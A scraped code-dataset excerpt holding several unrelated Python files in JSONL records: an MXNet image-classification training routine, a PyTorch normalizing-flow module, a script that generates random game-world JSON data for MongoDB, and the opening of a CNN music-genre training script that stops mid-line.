os.makedirs(\"/home/{}/mxnet_model/model/{}/{}/{}\".format(user, args.dataset, network_symbol, kv_store_type))\n\n model_prefix = \"/home/{}/mxnet_model/model/{}/{}/{}/{}-{}-{}-{}\".format(user, args.dataset, network_symbol, kv_store_type, kv_store_type, args.dataset, network_symbol, kv.rank)\n\n model_args = {}\n if args.retrain:\n tmp = mx.model.FeedForward.load(model_prefix, args.model_load_epoch)\n model_args = {'arg_params' : tmp.arg_params,\n 'aux_params' : tmp.aux_params,\n 'begin_epoch' : args.model_load_epoch}\n # TODO: check epoch_size for 'dist_sync' yegeyan 2017.1.13\n epoch_size = args.num_examples / args.batch_size\n model_args['begin_num_update'] = epoch_size * args.model_load_epoch\n # save model\n checkpoint = None if not args.savemodel else mx.callback.do_checkpoint(model_prefix)\n\n # data\n (train, val) = data_loader(args, kv)\n\n # train\n devs = mx.cpu() if args.gpus is None else [\n mx.gpu(int(i)) for i in args.gpus.split(',')]\n\n epoch_size = args.num_examples / args.batch_size\n batch_num = args.num_examples / args.batch_size #yegeyan 2016.12.13\n groups_path = '/home/' + getpass.getuser() + '/MXNet-G/example/image-classification/groups'\n group_num = len(open(groups_path, 'rU').readlines()) #yegeyan 2016.12.13\n \n if args.kv_store == 'dist_sync':\n epoch_size /= kv.num_workers\n batch_num /= kv.num_workers\n model_args['epoch_size'] = epoch_size\n\n if args.kv_store == 'dist_async' or args.kv_store == 'dist_ssync':\n epoch_size /= kv.num_workers\n model_args['epoch_size'] = epoch_size\n \n '''yegeyan 2016.12.13'''\n if args.kv_store == 'dist_gsync':\n if args.data_allocator == 1:\n epoch_size *= args.data_proportion\n batch_num = batch_num * group_num / kv.num_workers\n model_args['epoch_size'] = epoch_size\n else:\n epoch_size /= kv.num_workers\n #batch_num /= kv.num_workers\n batch_num = batch_num * group_num / kv.num_workers\n model_args['epoch_size'] = epoch_size\n\n if 'lr_factor' in args and args.lr_factor < 1:\n model_args['lr_scheduler'] = mx.lr_scheduler.FactorScheduler(\n step = max(int(batch_num * args.lr_factor_epoch), 1), #yegeyan 2016.12.13\n factor = args.lr_factor)\n\n if 'clip_gradient' in args and args.clip_gradient is not None:\n model_args['clip_gradient'] = args.clip_gradient\n\n # disable kvstore for single device\n if 'local' in kv.type and (\n args.gpus is None or len(args.gpus.split(',')) is 1):\n kv = None\n\n model = mx.model.FeedForward(\n ctx = devs,\n symbol = network,\n num_epoch = args.num_epochs,\n learning_rate = args.lr,\n momentum = 0.9,\n wd = 0.00001,\n initializer = mx.init.Xavier(factor_type=\"in\", magnitude=2.34),\n **model_args)\n\n eval_metrics = ['accuracy']\n ## TopKAccuracy only allows top_k > 1\n for top_k in [5, 10, 20]:\n eval_metrics.append(mx.metric.create('top_k_accuracy', top_k = top_k))\n #yegeyan 2017.1.4\n val_eval_metrics = ['accuracy']\n ## TopKAccuracy only allows top_k > 1\n for top_k in [5, 10, 20]:\n val_eval_metrics.append(mx.metric.create('top_k_accuracy', top_k = top_k))\n\n if batch_end_callback is not None:\n if not isinstance(batch_end_callback, list):\n batch_end_callback = [batch_end_callback]\n else:\n batch_end_callback = []\n batch_end_callback.append(mx.callback.Speedometer(args.batch_size, 50))\n\n\n model.fit(\n X = train,\n eval_data = val,\n eval_metric = eval_metrics,\n val_eval_metric = val_eval_metrics, #yegeyan 2017.1.4\n kvstore = kv,\n batch_end_callback = batch_end_callback,\n epoch_end_callback = checkpoint,\n hostname = args.hostname, #yegeyan 2016.10.6\n dataset = args.dataset,\n staleness = args.staleness,\n network_name = args.network,\n lr = args.lr) #yegeyan 2017.5.15\n","repo_name":"CGCL-codes/MXNet-G","sub_path":"example/image-classification/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"40558525331","text":"import torch.nn as nn\nimport FrEIA.framework as Ff\nimport FrEIA.modules as Fm\n\n\nclass FlowModule(nn.Module):\n \"\"\"Module combining all blocks for the FlowModule\n \"\"\"\n\n def __init__(self, subnet_architecture='conv_like', n_flowblocks=8):\n super(FlowModule, self).__init__() \n self.inn = Ff.SequenceINN(1024, 16, 16)\n for k in range(n_flowblocks):\n if subnet_architecture == 'conv_like':\n self.inn.append(Fm.AllInOneBlock, subnet_constructor=FlowModule.subnet_conv_3x3_1x1, permute_soft=False)\n if subnet_architecture == 'resnet_like':\n self.inn.append(Fm.AllInOneBlock, subnet_constructor=FlowModule.Conv3x3_res_1x1, permute_soft=False)\n \n\n class Conv3x3_res_1x1(nn.Module):\n \"\"\" A subnet choice for the coupling layer in the flow module:\n \"ResNet-type network with one 3 × 3 convolution layer with batch normalization and ReLU function, \n and a shortcut connection with 1 × 1 convolution will be added as the output.\" (Zhao et al., 2023)\n \n \"\"\"\n def __init__(self, size_in, size_out):\n super().__init__()\n self.conv = nn.Conv2d(size_in, size_out, kernel_size=3, padding='same', bias=1)\n self.bn = nn.BatchNorm2d(size_out)\n self.relu = nn.ReLU(inplace=True)\n self.res = nn.Conv2d(size_in, size_out, kernel_size=1, bias=0)\n def forward(self, x):\n output = self.conv(x)\n output = self.bn(output)\n output = self.relu(output)\n res = self.res(x)\n return output + res\n\n\n\n def subnet_conv_3x3_1x1(c_in, c_out):\n \"\"\"A Subnet choice for the coupling layer in the flow module:\n \"based on (Yu et al., 2021), for which each block contains two convolutional \n layers with ReLU activation function, and the corresponding kernel size is 3 × 3 and 1 × 1 respectively.\" (Zhao et al., 2023)\n \"\"\"\n return nn.Sequential(nn.Conv2d(c_in, 256, 3, padding=1), nn.ReLU(),\n nn.Conv2d(256, c_out, 1))\n\n\n def forward(self, x):\n z, log_jac_det = self.inn(x)\n return z, log_jac_det\n \n\n def reverse(self,z):\n x_rev, log_jac_det_rev = self.inn(z, rev=True)\n return x_rev, log_jac_det_rev\n ","repo_name":"pimpraat/ae_flow","sub_path":"src/model/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22669640563","text":"import os\nimport json\nimport random\n\n\nclass InventoryObject:\n def __init__(self, objetoId, nombre, stack, precio, tipo, tipoEsp):\n self.objetoId = objetoId\n self.nombre = nombre\n self.stack = stack\n self.precio = precio\n self.tipo = tipo\n self.tipoEsp = tipoEsp\n\n def get_json(self):\n return json.dumps(self.getDict())\n\n def get_dict(self):\n dict_values = {\"_id\": self.objetoId,\n \"nombre\": self.nombre,\n \"stack\": self.stack,\n \"precio\": self.precio,\n \"tipo\": self.tipo,\n \"tipoEsp\": self.tipoEsp\n }\n return dict_values\n\n\nclass MaterialObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp):\n global material_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"mat\" + str(material_id_count), nombre, stack, precio, tipo, tipoEsp)\n material_id_count += 1\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n\n return base_dict\n\n\nclass MuebleObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, color, conjunto):\n global mueble_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"mu\" + str(mueble_id_count), nombre, stack, precio, tipo, tipoEsp)\n mueble_id_count += 1\n\n self.color = color\n self.conjunto = conjunto\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"color\"] = self.color\n base_dict[\"conjunto\"] = self.conjunto\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\nclass PropObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, comestible):\n global prop_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"prop\" + str(prop_id_count), nombre, stack, precio, tipo, tipoEsp)\n prop_id_count += 1\n\n self.comestible = comestible\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"comestible\"] = self.comestible\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\nclass EquipableObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, lugar_eq):\n global equipable_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"equi\" + str(equipable_id_count), nombre, stack, precio, tipo, tipoEsp)\n equipable_id_count += 1\n\n self.lugar_eq = lugar_eq\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"lugar_eq\"] = self.lugar_eq\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\nclass ColeccionableObject:\n def __init__(self, nombre, stack, precio, tipo, tipoEsp, estacion, tamanio, localizacion, rareza):\n global coleccionable_id_count\n global all_objects\n\n self.inventoryObject = InventoryObject(\"col\" + str(coleccionable_id_count), nombre, stack, precio, tipo,\n tipoEsp)\n coleccionable_id_count += 1\n\n self.estacion = estacion\n self.tamanio = tamanio\n self.localizacion = localizacion\n self.rareza = rareza\n\n all_objects.append(self.get_dict())\n\n def get_dict(self):\n base_dict = self.inventoryObject.get_dict()\n base_dict[\"estacion\"] = self.estacion\n base_dict[\"tamanio\"] = self.tamanio\n base_dict[\"localizacion\"] = self.localizacion\n base_dict[\"rareza\"] = self.rareza\n\n return base_dict\n\n def get_json(self):\n return json.dumps(self.get_dict())\n\n\n# Globals\nfile_path = os.path.dirname(__file__) + \"\\\\Json\\\\\"\n\ncasas_path = file_path + \"casas.json\"\njugadores_path = file_path + \"jugadores.json\"\nisla_path = file_path + \"islas.json\"\nobjeto_path = file_path + \"objetos.json\"\n\nplayer_id_count = 0\nmueble_id_count = 0\ncoleccionable_id_count = 0\nmaterial_id_count = 0\nprop_id_count = 0\nequipable_id_count = 0\n\npersonaje_id_count = 0\n\ncasa_id_count = 0\n\nisla_id_count = 0\n\nedificio_id_count = 0\n\nvecino_id_count = 0\n\nall_objects = []\nall_casas = []\nall_jugadores = []\nall_vecinos = []\n\n\ndef get_random_color():\n random_value = random.randint(0, 5)\n color = \"\"\n if random_value == 0:\n color = \"Blanco\"\n elif random_value == 1:\n color = \"Rojo\"\n elif random_value == 2:\n color = \"Amarillo\"\n elif random_value == 3:\n color = \"Azul\"\n elif random_value == 4:\n color = \"Marron\"\n elif random_value == 5:\n color = \"Rosa\"\n\n return color\n\n\ndef get_adjective():\n adjectives = [\"Genial\", \"Mediocre\", \"del Monton\", \"Comun\", \"Impresionante\", \"muy Cuqui\", \"Cuqui\",\n \"Curioso\", \"Interesante\", \"sin Mas\", \"Correcto\", \"Atractivo\", \"Calido\", \"Precioso\",\n \"Azulado\", \"de Campeones\", \"Elegante\", \"Estilizado\", \"Magnifico\", \"Chachi\", \"Medio Roto\",\n \"Memorable\", \"que da que pensar\", \"Pijito\", \"Chismoso\", \"de Locos\", \"Perfecto\", \"Impecable\",\n \"para cogerle carinio\", \"Especial\", \"muy Especial\", \"Vistosito\", \"Regu\", \"que no esta mal\",\n \"un poco Hortera\", \"Hortera\", \"de Buen Gusto\"]\n\n return adjectives[random.randint(0, len(adjectives) - 1)]\n\n\ndef get_material_dict_list(size):\n dict_list = []\n\n names = [\"Piedra\", \"Pepita de Oro\", \"Madera\", \"Madera dura\", \"Madera blanda\", \"Hierro\"]\n stacks = [10, 20, 100, 200, 300]\n precios = [10, 100, 150, 200, 250, 300, 500]\n\n for i in range(size):\n name = names[random.randint(0, len(names) - 1)]\n stack = stacks[random.randint(0, len(stacks) - 1)]\n precio = precios[random.randint(0, len(precios) - 1)]\n tipo = \"Material\"\n tipoEsp = name\n\n dict_list.append(MaterialObject(name + \" \" + get_adjective(), stack, precio, tipo, tipoEsp).get_dict())\n\n return dict_list\n\n\ndef get_prop_dict_list(size):\n dict_list = []\n\n names = [\"Margarita\", \"Rosa\", \"Petunia\", \"Geranio\",\n \"Romero\", \"Lavanda\", \"Tomillo\", \"Ajenjo\", \"Hierbabuena\",\n \"Roble\", \"Manzano\", \"Abeto\", \"Pino\", \"Cipres\", \"Melocotonero\",\n \"Roca\", \"Amatista\", \"Caliza\", \"Marmol\", \"Arenisca\", \"Silex\",\n \"Naranja\", \"Manzana\", \"Uva\", \"Ciruela\", \"Tomate\"\n ]\n stacks = [10, 20, 100, 200, 300]\n precios = [10, 100, 150, 200, 250, 300, 500]\n tipos = [\"Flor\", \"Flor\", \"Flor\", \"Flor\",\n \"Arbusto\", \"Arbusto\", \"Arbusto\", \"Arbusto\", \"Arbusto\",\n \"Arbol\", \"Arbol\", \"Arbol\", \"Arbol\", \"Arbol\", \"Arbol\",\n \"Roca\", \"Roca\", \"Roca\", \"Roca\", \"Roca\", \"Roca\",\n \"Fruta\", \"Fruta\", \"Fruta\", \"Fruta\", \"Fruta\"\n ]\n comestibles = [False, False, False, False,\n False, False, False, False, False,\n False, False, False, False, False, False,\n False, False, False, False, False, False,\n True, True, True, True, True]\n\n tipo = \"Prop\"\n for i in range(size):\n name_i = random.randint(0, len(names) - 1)\n\n name = names[name_i] + \" \" + get_adjective()\n stack = stacks[random.randint(0, len(stacks) - 1)]\n precio = precios[random.randint(0, len(precios) - 1)]\n tipoEsp = tipos[name_i]\n\n dict_list.append(PropObject(name, stack, precio, tipo, tipoEsp, comestibles[name_i]).get_dict())\n\n return dict_list\n\n\ndef get_equip_dict_list(size):\n dict_list = []\n\n names = [\"Fedora\", \"Gorrita\", \"Sombrero de Ala\", \"Sombrero de paja\", \"Visera\",\n \"Blusa\", \"Jersey\", \"Camisa Hawaiana\", \"Chaleco\", \"Camisa\",\n \"Leggins\", \"Pantaloncito corto\", \"Kilt\", \"Chandal\", \"Falda\", \"Vaqueros\",\n \"Taconazo\", \"Zapatillas\", \"Sandalia\", \"Zuecos\", \"Chanclas\", \"Botas\",\n \"Red\", \"Pico\", \"Pala\", \"Cania\", \"Lupa\"\n ]\n precios = [10, 100, 150, 200, 250, 300, 500, 1000, 2000, 2750, 5000]\n tipos = [\"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\", \"Ropa\",\n \"Herramienta\", \"Herramienta\", \"Herramienta\", \"Herramienta\", \"Herramienta\"\n ]\n\n lugar_equips = [\"Cabeza\", \"Cabeza\", \"Cabeza\", \"Cabeza\", \"Cabeza\",\n \"Torso\", \"Torso\", \"Torso\", \"Torso\", \"Torso\",\n \"Piernas\", \"Piernas\", \"Piernas\", \"Piernas\", \"Piernas\", \"Piernas\",\n \"Pies\", \"Pies\", \"Pies\", \"Pies\", \"Pies\", \"Pies\",\n \"Manos\", \"Manos\", \"Manos\", \"Manos\", \"Manos\"]\n\n tipo = \"Equipable\"\n for i in range(size):\n name_i = random.randint(0, len(names) - 1)\n\n name = names[name_i] + \" \" + get_adjective()\n stack = 1\n precio = precios[random.randint(0, len(precios) - 1)]\n tipoEsp = tipos[name_i]\n lugar_equip = lugar_equips[name_i]\n\n dict_list.append(EquipableObject(name, stack, precio, tipo, tipoEsp, lugar_equip).get_dict())\n\n return dict_list\n\n\ndef get_col_dict_list(size):\n dict_list = []\n\n names = [\"Craneo\", \"Amonites\", \"Hueso\", \"DinoHueso\", \"Trilobites\",\n \"Carpa\", \"Palometa\", \"Pez Sable\", \"Tiburon\", \"Mero\",\n \"BichoPalo\", \"Mariposa\", \"Hormiguita\", \"Escarabajo\", \"Escararriba\"\n ]\n precios = [1000, 2000, 2750, 5000, 6000, 10000]\n tipos = [\"Fosil\", \"Fosil\", \"Fosil\", \"Fosil\", \"Fosil\",\n \"Pez\", \"Pez\", \"Pez\", \"Pez\", \"Pez\",\n \"Insecto\", \"Insecto\", \"Insecto\", \"Insecto\", \"Insecto\"\n ]\n\n localizations = [\"Tierra\", \"Bajo tierra\", \"Tierra\", \"Bajo Tierra\", \"Bajo Tierra\",\n \"Rio\", \"Mar\", \"Mar\", \"Mar\", \"Cascada\",\n \"Estanque\", \"Valle\", \"Boca del Rio\", \"Colina\", \"Colina\"]\n\n estaciones = [\"Primavera\", \"Invierno\", \"Verano\", \"Otonio\"]\n\n tipo = \"Coleccionable\"\n for i in range(size):\n name_i = random.randint(0, len(names) - 1)\n\n name = names[name_i] + \" \" + get_adjective()\n stack = 1\n precio = precios[random.randint(0, len(precios) - 1)]\n tipoEsp = tipos[name_i]\n estacion = estaciones[random.randint(0, len(estaciones) - 1)]\n tamanio = random.randint(1, 5)\n localization = localizations[name_i]\n rareza = random.randint(1, 10)\n\n dict_list.append(\n ColeccionableObject(name, stack, precio, tipo, tipoEsp, estacion, tamanio, localization, rareza).get_dict())\n\n return dict_list\n\n\ndef get_mueble_dict_list(size):\n dict_list = []\n\n names = [\"Silla\", \"Mesa\", \"Mesita\", \"Armario\", \"Estanteria\", \"Cama\"]\n precios = [10, 100, 150, 200, 250, 300, 500]\n tipo = \"Mueble\"\n conjuntos = [\"Congelado\", \"Dorado\", \"Setas\", \"Flor de cerezo\", \"Bambu\", \"Mimbre\", \"Restaurante\",\n \"Imperial\",\n \"Flores\", \"Linda\", \"Mariana\", \"Veraniego\", \"Frutas\", \"Zodiaco\", \"Universitario\"]\n\n stack = 1\n for i in range(size):\n name = names[random.randint(0, len(names) - 1)]\n precio = precios[random.randint(0, len(precios) - 1)]\n color = get_random_color()\n tipoEsp = name\n conjunto = conjuntos[random.randint(0, len(conjuntos) - 1)]\n\n dict_list.append(\n MuebleObject(name + \" \" + get_adjective(), stack, precio, tipo, tipoEsp, color, conjunto).get_dict())\n\n return dict_list\n\n\ndef write_file(file, values):\n file = open(file, \"w\")\n file.write(json.dumps(values))\n file.close()\n\n\ndef find_casa_by_id(casa_id):\n global all_casas\n casa_index = casa_id.replace('c', \"\")\n casa_index = int(casa_index)\n\n return all_casas[casa_index]\n\n\ndef get_casa():\n global casa_id_count\n global casas_list\n global all_casas\n\n casa_dict = {\"_id\": \"c\" + str(casa_id_count),\n \"colorFachada\": get_random_color(),\n \"colorTejado\": get_random_color(),\n\n \"inventarioCasa\": (get_col_dict_list(random.randint(0, 5))\n + get_equip_dict_list(random.randint(0, 5))\n + get_prop_dict_list(random.randint(0, 5))\n + get_material_dict_list(random.randint(0, 5))\n + get_mueble_dict_list(random.randint(0, 5))\n )\n }\n\n casa_id_count += 1\n all_casas.append(casa_dict)\n\n return casa_dict\n\n\ndef get_player():\n global jugadores_path\n global player_id_count\n global all_players\n global all_vecinos\n\n nombres = [\"Pepito\", \"Juana\", \"Jennifer\", \"Stella\", \"Antonio\", \"Marco\", \"Marcela\", \"Diego\", \"Dolores\", \"Lola\",\n \"Pedrito\", \"Jose\", \"Stuart\", \"John\", \"Harry\",\n \"Constantino\", \"Miguel\", \"Carlitos\", \"Isabela\", \"Elisa\", \"Ludwig\", \"Caluro\", \"Oscar\", \"Solaire\", \"Largo\",\n \"Daniel\", \"Julio\", \"Alfonso\", \"Humberto\",\n \"Roberto\", \"Alicia\", \"Ana\", \"Dolly\", \"Yerma\", \"Eva\", \"Ivan\", \"Alejandro\",\n \"David\", \"Elena\", \"Carmen\", \"Joseph\", \"Charlie\", \"Elias\", \"Pablito\",\n \"Laura\", \"Carolina\", \"Adrian\", \"Francisco\", \"Sara\", \"Julia\", \"Paula\", \"Sofia\", \"Dorotea\", \"Lupita\",\n \"Josefa\"]\n\n bayas_list = [1000, 2000, 3000, 12000]\n\n player_id_count += 1\n nombre = nombres[player_id_count % len(nombres)]\n\n casa = get_casa()\n\n bayas = bayas_list[random.randint(0, len(bayas_list) - 1)]\n millas = bayas_list[random.randint(0, len(bayas_list) - 1)]\n\n inventario = get_mueble_dict_list(random.randint(0, 3)) + \\\n get_equip_dict_list(random.randint(0, 10)) + \\\n get_col_dict_list(random.randint(0, 3)) + \\\n get_material_dict_list(random.randint(0, 3)) + \\\n get_prop_dict_list(random.randint(0, 3))\n\n vecinos = []\n\n jugador_dict = {\n \"_id\": \"j\" + str(player_id_count),\n \"nombre\": nombre,\n \"cumpleanios\": str(random.randint(1, 29)) + \"-\" + str(random.randint(1, 12)) + \"-\" + str(\n random.randint(1990, 2005)),\n \"casa\": casa[\"_id\"],\n \"bayas\": bayas,\n \"millas\": millas,\n\n \"inventarioObjetos\": inventario,\n \"vecinos\": vecinos\n }\n\n all_jugadores.append(jugador_dict)\n\n return jugador_dict\n\n\ndef write_islas(isla_count):\n global isla_path\n global edificio_id_count\n global all_casas\n global isla_id_count\n global personaje_id_count\n\n islas = []\n nombres = [\"AlcorOn\", \"SouthPeru\", \"MostToLess\", \"TorriHoes\", \"WestMadriz\"]\n hemisferios = [\"N\", \"S\"]\n\n fechas = [\"10-5-2022\", \"9-5-2022\", \"11-5-2022\", \"12-5-2022\"]\n horas = [\"8:22:23\", \"9:22:23\", \"10:22:23\", \"11:22:23\", \"12:22:23\", \"13:22:23\", \"14:22:23\"]\n climatologias = [\"Nublado\", \"Soleado\", \"Tormenta\", \"Lluvia\", \"Nieve\", \"Muy Soleado\", \"Calima\"]\n edificios = [\"Ayuntamiento\", \"Museo\", \"Tienda\", \"Peluqueria\", \"Aerodromo\"]\n\n for i in range(isla_count):\n jugadores = []\n vecinos = []\n casas_de_isla = []\n objetos_de_isla = []\n\n edificios_dict_list = []\n\n personajes_dict = [\n {\n \"_id\": \"pj\" + str(personaje_id_count),\n \"nombre\": \"Tom Nook\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 1),\n \"nombre\": \"Canela\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 2),\n \"nombre\": \"Arquimedes\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 3),\n \"nombre\": \"Pili y Mili\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 4),\n \"nombre\": \"Marilin\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 5),\n \"nombre\": \"Rodri y Rafa\",\n }\n ]\n personaje_id_count += 6\n\n for i in range(len(edificios)):\n\n personajes = []\n if i == 0:\n personajes = [personajes_dict[0], personajes_dict[1]]\n elif i == 1:\n personajes = [personajes_dict[2]]\n elif i == 2:\n personajes = [personajes_dict[3]]\n elif i == 3:\n personajes = [personajes_dict[4]]\n elif i == 4:\n personajes = [personajes_dict[5]]\n\n dict = {\n \"_id\": \"ed\" + str(edificio_id_count),\n \"tipo\": edificios[i],\n \"personajes\": personajes,\n\n \"inventarioEdificio\": get_mueble_dict_list(random.randint(0, 5)) +\n get_col_dict_list(random.randint(0, 5)) +\n get_mueble_dict_list(random.randint(0, 5)) +\n get_prop_dict_list(random.randint(0, 5)) +\n get_material_dict_list(random.randint(0, 5)) +\n get_equip_dict_list(random.randint(0, 2))\n }\n\n edificio_id_count += 1\n edificios_dict_list.append(dict)\n\n for i in range(random.randint(2, 8)):\n new_vecino = get_vecino()\n vecinos.append(new_vecino)\n\n casa_id = new_vecino[\"casa\"]\n casas_de_isla.append(casa_id)\n\n # Find casa\n casa = find_casa_by_id(casa_id)\n objetos_de_isla += casa[\"inventarioCasa\"]\n\n for i in range(random.randint(1, 3)):\n new_jugador = get_player()\n\n jugadores.append(new_jugador[\"_id\"])\n\n casas_de_isla.append(new_jugador[\"casa\"])\n\n casa = find_casa_by_id(new_jugador[\"casa\"])\n\n objetos_de_isla.append(casa[\"inventarioCasa\"])\n\n vecinos_copy = vecinos.copy()\n\n for i in range(2, 5):\n if len(vecinos_copy) == 0:\n break\n\n random_index = random.randint(0, len(vecinos_copy) - 1)\n new_vecino = vecinos_copy.pop(random_index)\n\n new_jugador[\"vecinos\"].append({\n \"_id\": new_vecino[\"_id\"],\n \"amistad\": random.randint(1, 10)\n\n })\n\n isla_dict = {\"_id\": \"is\" + str(isla_id_count),\n \"jugadores\": jugadores,\n \"nombre\": nombres[isla_id_count % len(nombres)],\n \"hemisferio\": hemisferios[random.randint(0, len(hemisferios) - 1)],\n \"fecha\": fechas[random.randint(0, len(fechas) - 1)],\n \"hora\": horas[random.randint(0, len(fechas) - 1)],\n \"climatologia\": climatologias[random.randint(0, len(climatologias) - 1)],\n \"edificios\": edificios_dict_list,\n \"inventarioIsla\": objetos_de_isla,\n \"casas\": casas_de_isla,\n \"vecinos\": vecinos\n }\n islas.append(isla_dict)\n isla_id_count += 1\n\n write_file(isla_path, {\"Islas\": islas})\n\n\ndef get_vecino():\n global vecino_id_count\n global all_vecinos\n\n names = [\"Paco\", \"Joshua\", \"Patri\", \"Marcelyn\", \"Apollo\", \"Steacy\", \"Carlos\", \"Queque\", \"Ariel\",\n \"Narciso\", \"Munchi\", \"Morfeo\", \"Rosezna\", \"Luna\", \"Alderia\", \"Adela\", \"Agreste\", \"Alba\",\n \"Albino\", \"Aliste\", \"Cabriola\", \"Cabralex\", \"Cachemir\", \"Camelio\", \"Babu\", \"Bambina\", \"Bayo\",\n \"Bea\", \"Beelen\", \"Belinda\", \"Bella\", \"Benito\", \"Deira\", \"Dentina\", \"Dori\", \"Draco\", \"Dragonio\",\n \"Deivid\", \"Fabiola\", \"Fardilla\", \"Fauna\", \"Feli\", \"Felipe\" \"Gabino\", \"Ganon\", \"Gaston\",\n \"Hanalulu\", \"Hans\", \"Harpo\", \"Isadora\", \"Jacinto\", \"Jacobo\", \"Jaime\", \"Jairo\", \"Kabuki\",\n \"Kaiman\", \"Kasandra\", \"Katia\", \"Lali\", \"Lanolina\", \"Lili\", \"Madam Rosa\", \"Magenta\", \"Marcial\",\n \"Nabar\", \"Nachete\", \"Nana\", \"Narciso\", \"Octavio\", \"Octoberto\", \"Ofelia\", \"Pablo\", \"Paquito\",\n \"Quetzal\", \"Radiolo\", \"Ramina\", \"Sabana\", \"Saltiago\", \"Sanson\", \"Tabita\", \"Talia\", \"Tami\",\n \"Tania\", \"Ulises\", \"Uno\", \"Vacarena\", \"Wanda\", \"Wolfi\", \"Yuka\", \"Zapiron\", \"Zelanda\"\n ]\n\n personalidades = [\"Atletico\", \"Esnob\", \"Grunion\", \"Perezoso\", \"Alegre\", \"Dulce\", \"Presumida\", \"Normal\"]\n\n casa = get_casa()\n\n name_id = vecino_id_count\n if vecino_id_count >= len(names):\n name_id = name_id % len(names)\n\n print(\"Care: Names are repeated!\")\n\n vecino_dict = {\n \"_id\": \"vec\" + str(name_id),\n \"nombre\": names[vecino_id_count],\n \"personalidad\": personalidades[random.randint(0, len(personalidades) - 1)],\n \"casa\": casa[\"_id\"]\n }\n vecino_id_count += 1\n\n all_vecinos.append(vecino_dict)\n\n return vecino_dict\n\n\nwrite_islas(5)\n\nwrite_file(objeto_path, {\"Objetos\": all_objects})\nwrite_file(casas_path, {\"Casas\": all_casas})\nwrite_file(jugadores_path, {\"Jugadores\": all_jugadores})\n","repo_name":"hal-9001-v/Gestioncita","sub_path":"Practica 3/mongoWriter.py","file_name":"mongoWriter.py","file_ext":"py","file_size_in_byte":21190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30955080064","text":"import os\nimport ntpath\nimport sys\nimport csv\nfrom cnn import cnn\nimport numpy as np\nimport random\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\n\nPACKAGE_PARENT = '../..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom audio_preprocessor import audio_preprocessor as ap\nfrom feature_extractor import feature_extractor as fe\nfrom feature_extractor import feature_type as ft\n\nif __name__ == '__main__':\n\n #Configure the size of training, testing sets and the number of classes we're matching against, and whether we will randomly picking value or sequentially picking value\n trainingSetSize = 6400\n testingSetSize = 800\n classSize = trainingSetSize\n randomize = False\n\n myAP = ap()\n myFE = fe()\n audioPathList = myAP.list_of_all_audio_files\n if randomize:\n random.shuffle(audioPathList)\n trainTrackID = myFE.get_training_dataset_song_ids()\n trainDataLst = []\n trainClassLst = []\n trainClassStrLst = []\n trainTrackIDLst = []\n trainTrackIdStrLst = []\n classDict = {}\n nextClassID = 0\n print('Now loading training data...')\n\n spectrogramLowestCol = 2147483647\n spectrogramLowestRow = 2147483647\n #Load the Training data...\n i = 0\n for path in audioPathList:\n trackIDStr = os.path.splitext(ntpath.basename(path))[0]\n trackIDInt = int(trackIDStr)\n if os.path.exists(path) and (trackIDInt in trainTrackID):\n currentClass = myFE.get_genre(trackIDInt)\n currentClassID = -1\n if classDict.get(currentClass) == None and len(classDict) < classSize:\n classDict[currentClass] = nextClassID\n currentClassID = nextClassID\n nextClassID+=1\n elif classDict.get(currentClass) == None and len(classDict) >= classSize:\n continue\n else:\n currentClassID = classDict[currentClass]\n print('Loading track '+trackIDStr + ' with genre '+currentClass + ' ('+str(i+1)+'/'+str(trainingSetSize)+')')\n currentSpectrogram = myAP.get_mel_spectrogram_with_cache(path)\n if(len(currentSpectrogram[0]) < spectrogramLowestCol):\n spectrogramLowestCol=len(currentSpectrogram[0])\n if(len(currentSpectrogram) < spectrogramLowestRow):\n spectrogramLowestRow=len(currentSpectrogram)\n trainDataLst.append(currentSpectrogram)\n trainClassStrLst.append(currentClass)\n trainClassLst.append(currentClassID)\n trainTrackIDLst.append(trackIDInt)\n trainTrackIdStrLst.append(trackIDStr)\n i+=1\n if i >= trainingSetSize:\n break\n print('Training data loaded.')\n\n #Load the testing data...\n i = 0\n print('Now loading testing data...')\n testTrackID = myFE.get_validation_dataset_song_ids()\n testDataLst = []\n testClassLst = []\n testClassStrLst = []\n testTrackIdLst = []\n testTrackIdStrLst = []\n for path in audioPathList:\n trackIDStr = 